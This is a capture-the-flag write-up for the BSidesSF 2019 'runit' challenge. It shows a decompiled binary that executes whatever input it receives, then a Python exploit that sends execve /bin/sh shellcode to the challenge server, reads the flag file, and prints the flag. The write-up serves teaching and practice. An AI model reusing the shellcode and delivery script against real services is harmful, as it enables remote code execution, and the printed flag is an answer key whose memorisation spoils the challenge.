BSidesSF 2019 CTF Pwn runit

runit

Send code to the server, and it'll run! Grab the flag from /home/ctf/flag.txt Location - runit-5094b2cb.challenges.bsidessf.net:5252

$ file runit 
runit: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4591be57, not stripped

# checksec.sh --file runit
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   runit

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  void *buf; // [esp+8h] [ebp-10h]

  buf = mmap(0, 0x400u, 7, 34, 0, 0);
  alarm(0xAu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 2, 0);
  puts("Send me stuff!!");
  if ( read(0, buf, 0x400u) < 0 )
  {
    puts("Error reading!");
    exit(1);
  }
  ((void (*)(void))buf)();
  return 0;
}
# -*- coding: utf-8 -*-
import os
import sys
import time
import re
import struct
import socket

def p(a):return struct.pack('<I', a)
def u(a):return struct.unpack('<I', a)[0]
def p64(a):return struct.pack('<Q', a)
def u64(a):return struct.unpack('<Q', a)[0]

def connect(host, port):
    return socket.create_connection((host, port))

def recvuntil(st, debug=False):
    ret = ""
    while st not in ret:
        lret = s.recv(1)
        if debug and len(lret) > 0:
            print lret
        ret += lret
    return ret

def recvn(n):
    ret = ""
    while len(ret) != n:
        ret += s.recv(1)
    return ret

def interact():
    import telnetlib
    t = telnetlib.Telnet()
    t.sock = r
    t.interact()

host = 'runit-5094b2cb.challenges.bsidessf.net'
port = 5252

r = connect(host, port)

shellcode = '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'

print r.recv(1024)

payload = ''
payload += shellcode

r.send(payload)
print r.recv(1024)

r.send('cat /home/ctf/flag.txt\n')
print r.recv(1024)
# interact()
$ python exploit.py
Send me stuff!!


CTF{you_ran_it}